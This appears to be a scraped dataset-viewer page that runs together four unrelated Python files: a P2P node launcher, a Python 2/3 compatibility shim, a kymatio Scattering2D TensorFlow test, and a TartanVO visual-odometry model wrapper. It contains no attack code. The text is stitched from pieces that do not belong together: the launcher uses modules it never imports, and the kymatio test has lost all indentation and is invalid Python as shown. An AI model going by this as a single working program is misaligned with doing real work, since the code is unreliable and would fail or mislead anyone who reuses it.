logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def main():
    """Start a BasePeer P2P node identified by a CLI-supplied node id."""
    parser = argparse.ArgumentParser()
    parser.add_argument("node_id", help='Id of the node in the given peers dict.')
    # parser.add_argument("port", help='Listening port.')
    cli_args = parser.parse_args()
    # Port 0 means the listening port is autodiscovered/assigned.
    peer = BasePeer(cli_args.node_id)
    peer.run_p2p(0)


if __name__ == "__main__":
    main()
import sys
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
# True only on Python 2.6 exactly (which needs the unittest2 backport).
PY26 = sys.version_info[0] == 2 and sys.version_info[1] == 6
if PY3:
    # NOTE(review): BytesIO is deliberately aliased as StringIO here --
    # presumably callers treat the buffer as bytes; confirm before changing.
    from io import BytesIO as StringIO
    from urllib.parse import urlparse
else:
    # Python 2 spellings of the same names.
    from urlparse import urlparse  # noqa
    from cStringIO import StringIO  # noqa
if PY26:
    from unittest2 import TestCase
else:
    from unittest import TestCase
if PY3:
    def to_bytes(string):
        # Encode a text string to UTF-8 bytes.
        return bytes(string, 'utf-8')
else:
    # On Python 2, str is already bytes, so this is a no-op.
    to_bytes = lambda s: s
|
import os
import io
import tensorflow as tf
from kymatio.scattering2d import Scattering2D
import torch
import numpy as np
import pytest
from kymatio.backend.fake_backend import backend as fake_backend
class TestScattering2DTensorflow:
def reorder_coefficients_from_interleaved(self, J, L):
# helper function to obtain positions of order0, order1, order2 from interleaved
order0, order1, order2 = [], [], []
n_order0, n_order1, n_order2 = 1, J * L, L ** 2 * J * (J - 1) // 2
n = 0
order0.append(n)
for j1 in range(J):
for l1 in range(L):
n += 1
order1.append(n)
for j2 in range(j1 + 1, J):
for l2 in range(L):
n += 1
order2.append(n)
assert len(order0) == n_order0
assert len(order1) == n_order1
assert len(order2) == n_order2
return order0, order1, order2
def test_Scattering2D(self):
test_data_dir = os.path.dirname(__file__)
data = None
with open(os.path.join(test_data_dir, 'test_data_2d.pt'), 'rb') as f:
buffer = io.BytesIO(f.read())
data = torch.load(buffer)
x = data['x'].numpy()
S = data['Sx'].numpy()
J = data['J']
# we need to reorder S from interleaved (how it's saved) to o0, o1, o2
# (which is how it's now computed)
o0, o1, o2 = self.reorder_coefficients_from_interleaved(J, 8)
reorder = np.concatenate((o0, o1, o2))
S = S[..., reorder, :, :]
pre_pad = data['pre_pad']
M, N = x.shape[2:]
# Tf
scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad, frontend='tensorflow')
Sg = scattering(x)
assert np.allclose(Sg, S)
def test_inputs(self):
with pytest.raises(RuntimeError) as ve:
scattering = Scattering2D(2, shape=(10, 10), frontend='tensorflow', backend=fake_backend)
assert 'not supported' in ve.value.args[0]
with pytest.raises(RuntimeError) as ve:
scattering = Scattering2D(10, shape=(10, 10), frontend='tensorflow')
assert 'smallest dimension' in ve.value.args[0] |
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, Wenshan Wang, Yaoyu Hu, CMU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of CMU nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import torch
import numpy as np
import time
np.set_printoptions(precision=4, suppress=True, threshold=10000)
from Network.VONet import VONet
class TartanVO(object):
    """Wrapper around VONet for batched visual-odometry inference on CUDA."""

    def __init__(self, model_name):
        self.vonet = VONet()
        # Load pretrained weights when a .pkl checkpoint name is given.
        if model_name.endswith('.pkl'):
            modelname = 'models/' + model_name
            self.load_model(self.vonet, modelname)
        self.vonet.cuda()
        self.test_count = 0
        self.pose_std = np.array([ 0.13, 0.13, 0.13, 0.013 , 0.013, 0.013], dtype=np.float32) # the output scale factor
        self.flow_norm = 20 # scale factor for flow

    def load_model(self, model, modelname):
        """Load weights from *modelname*, tolerating DataParallel prefixes.

        Returns the model with the matching weights loaded; raises if no
        weight name matches the model at all.
        """
        preTrainDict = torch.load(modelname)
        model_dict = model.state_dict()
        # Keep only weights whose names match the current model.
        preTrainDictTemp = {k: v for k, v in preTrainDict.items() if k in model_dict}
        if 0 == len(preTrainDictTemp):
            print("Does not find any module to load. Try DataParallel version.")
            # DataParallel checkpoints prefix every key with 'module.';
            # strip the first 7 characters and retry the match.
            for k, v in preTrainDict.items():
                kk = k[7:]
                if kk in model_dict:
                    preTrainDictTemp[kk] = v
        if 0 == len(preTrainDictTemp):
            raise Exception("Could not load model from %s." % (modelname), "load_model")
        model_dict.update(preTrainDictTemp)
        model.load_state_dict(model_dict)
        print('Model loaded...')
        return model

    def test_batch(self, sample):
        """Run one inference batch; returns (pose, flow) numpy arrays.

        sample: dict with 'img1', 'img2', 'intrinsic' tensors and an
        optional 'motion' ground-truth used to recover translation scale.
        """
        self.test_count += 1
        img0 = sample['img1'].cuda()
        img1 = sample['img2'].cuda()
        intrinsic = sample['intrinsic'].cuda()
        inputs = [img0, img1, intrinsic]
        self.vonet.eval()
        with torch.no_grad():
            starttime = time.time()
            flow, pose = self.vonet(inputs)
            inferencetime = time.time()-starttime
        posenp = pose.data.cpu().numpy()
        posenp = posenp * self.pose_std # The output is normalized during training, now scale it back
        flownp = flow.data.cpu().numpy()
        flownp = flownp * self.flow_norm
        # calculate scale from GT posefile
        if 'motion' in sample:
            motions_gt = sample['motion']
            # BUGFIX: 'scale' was referenced without being computed (the
            # line below had been commented out), raising NameError
            # whenever ground-truth motion was supplied.
            scale = np.linalg.norm(motions_gt[:,:3], axis=1)
            trans_est = posenp[:,:3]
            trans_est = trans_est/np.linalg.norm(trans_est,axis=1).reshape(-1,1)*scale.reshape(-1,1)
            posenp[:,:3] = trans_est
        else:
            print(' scale is not given, using 1 as the default scale value..')
        print("{} Pose inference using {}s: \n{}".format(self.test_count, inferencetime, posenp))
        return posenp, flownp
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.